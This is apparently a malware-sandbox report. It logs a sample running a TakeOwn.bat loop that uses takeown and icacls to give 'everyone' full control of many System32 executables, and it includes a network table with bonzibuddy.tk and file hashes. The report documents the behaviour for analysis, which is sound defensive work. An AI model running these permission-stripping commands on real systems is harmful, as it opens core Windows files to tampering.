C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cacls.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cacls.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cacls.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\calc.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\calc.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\calc.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CameraSettingsUIHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\CameraSettingsUIHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\CameraSettingsUIHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CertEnrollCtrl.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\CertEnrollCtrl.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\CertEnrollCtrl.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\certreq.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\certreq.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\certreq.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\certutil.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\certutil.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\certutil.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\charmap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\charmap.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\charmap.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CheckNetIsolation.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\CheckNetIsolation.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\CheckNetIsolation.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\chkdsk.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\chkdsk.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\chkdsk.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\chkntfs.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\chkntfs.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\chkntfs.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\choice.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\choice.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\choice.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cipher.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cipher.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cipher.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cleanmgr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cleanmgr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cleanmgr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cliconfg.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cliconfg.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cliconfg.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\clip.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\clip.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\clip.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CloudNotifications.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\CloudNotifications.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\CloudNotifications.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmd.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cmd.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cmd.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmdkey.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cmdkey.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cmdkey.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmdl32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cmdl32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cmdl32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmmon32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cmmon32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cmmon32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cmstp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cmstp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cmstp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\colorcpl.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\colorcpl.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\colorcpl.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Com\comrepl.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\Com\comrepl.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\Com\comrepl.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Com\MigRegDB.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\Com\MigRegDB.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\Com\MigRegDB.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\comp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\comp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\comp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\compact.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\compact.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\compact.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ComputerDefaults.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\ComputerDefaults.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\ComputerDefaults.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\control.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\control.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\control.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\convert.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\convert.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\convert.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\CredentialUIBroker.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\CredentialUIBroker.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\CredentialUIBroker.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\credwiz.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\credwiz.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\credwiz.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cscript.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cscript.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cscript.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ctfmon.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\ctfmon.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\ctfmon.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cttune.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cttune.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cttune.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\cttunesvr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\cttunesvr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\cttunesvr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\curl.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\curl.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\curl.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dccw.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\dccw.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\dccw.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dcomcnfg.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\dcomcnfg.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\dcomcnfg.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ddodiag.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\ddodiag.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\ddodiag.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\DevicePairingWizard.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\DevicePairingWizard.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\DevicePairingWizard.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dfrgui.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\dfrgui.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\dfrgui.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dialer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\dialer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\dialer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\diskpart.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\diskpart.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\diskpart.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\diskperf.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\diskperf.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\diskperf.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\diskusage.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\diskusage.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\diskusage.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Dism\DismHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\Dism\DismHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\Dism\DismHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\Dism.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\Dism.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\Dism.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\dllhost.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 104.21.78.241:80 | bonzibuddy.tk | tcp |
| US | 104.21.78.241:80 | bonzibuddy.tk | tcp |
| US | 104.21.78.241:443 | bonzibuddy.tk | tcp |
| NL | 23.63.101.171:80 | apps.identrust.com | tcp |
| US | 151.101.194.137:443 | code.jquery.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| GB | 51.105.71.137:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.155:443 | r.bing.com | tcp |
| NL | 23.62.61.129:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.72:443 | th.bing.com | tcp |
| NL | 23.62.61.72:443 | th.bing.com | tcp |
| US | 204.79.197.200:443 | bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| IE | 40.126.31.71:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| GB | 142.250.200.35:443 | recaptcha.net | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 34.125.80.210:443 | e2c30.gcp.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.72:443 | th.bing.com | tcp |
| NL | 23.62.61.72:443 | th.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 2.19.252.134:443 | aefd.nelreports.net | tcp |
| US | 2.19.252.134:443 | aefd.nelreports.net | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| NL | 23.62.61.155:443 | th.bing.com | tcp |
| NL | 23.62.61.155:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 185.199.109.153:443 | teamwork.github.io | tcp |
| US | 185.199.109.153:443 | teamwork.github.io | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| US | 172.67.138.185:80 | bonzibuddy.tk | tcp |
| US | 172.67.138.185:80 | bonzibuddy.tk | tcp |
| US | 172.67.138.185:443 | bonzibuddy.tk | tcp |
| NL | 23.62.61.97:443 | th.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
Files
memory/3760-0-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-2-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-1-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-3-0x00007FFE8D6E3000-0x00007FFE8D6E4000-memory.dmp
memory/3760-5-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-4-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-6-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-7-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-8-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-9-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-11-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-12-0x00007FFE4AF20000-0x00007FFE4AF30000-memory.dmp
memory/3760-10-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-13-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-15-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-14-0x00007FFE4AF20000-0x00007FFE4AF30000-memory.dmp
memory/3760-20-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-21-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-19-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-18-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-17-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-16-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
memory/3760-59-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-60-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-62-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-61-0x00007FFE4D6D0000-0x00007FFE4D6E0000-memory.dmp
memory/3760-63-0x00007FFE8D640000-0x00007FFE8D849000-memory.dmp
\??\pipe\crashpad_2164_MYOFHUVMUPTHEUWH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
